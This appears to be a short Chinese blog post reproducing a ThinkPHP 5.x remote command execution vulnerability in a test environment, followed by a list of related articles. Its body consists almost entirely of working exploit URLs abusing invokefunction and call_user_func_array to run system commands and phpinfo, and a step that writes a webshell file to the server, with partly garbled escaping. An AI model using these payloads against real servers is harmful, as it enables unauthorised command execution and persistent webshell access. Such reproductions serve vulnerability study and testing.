Thinkphp5x远程命令执⾏及getshell

2301_815255182024-09-24 12:11

启动环境查看端口

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=id ![](https://i-blog.csdnimg.cn/direct/71c2408fcf614719986569264e20893f.png) ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/3035c9bc75d545d387ac0b0359d85963.png) ? s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1

\]=echo "\" \>\>1.php ![](https://i-blog.csdnimg.cn/direct/10d4fe0c722944ceaa489763ceab5209.png) 访问1.php ![](https://i-blog.csdnimg.cn/direct/fc7472516e4840998cb786e1cf50fc8a.png)

相关推荐
一次旅行2 天前
网络安全总结
安全·web安全
red1giant_star2 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透2 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全
一名优秀的码农3 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
Libraeking3 天前
05 安全边界:MCP Server 的权限沙箱与敏感数据保护
安全
龙仔7253 天前
在麒麟V10服务器安全加固,sshd防暴力破解加固,实现“密码错误3次封IP”的需求
服务器·tcp/ip·安全
上海云盾-小余3 天前
即时通讯App的DDoS防御架构设计
运维·服务器·安全
上海云盾商务经理杨杨3 天前
2025年重大网络安全事件回顾与趋势分析
网络·安全·web安全
T_Fire_of_Square3 天前
工控安全-2024振兴杯-被攻击的电机wp
安全
PM老周3 天前
2026年软硬件一体化项目管理软件怎么选?多款工具对比测评
java·安全·硬件工程·团队开发·个人开发
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤05OpenClaw + 飞书(Feishu)环境搭建指南06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08Window 10部署openclaw报错node.exe : npm error code 12809AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot10OpenClaw优化飞书API 额度已耗尽问题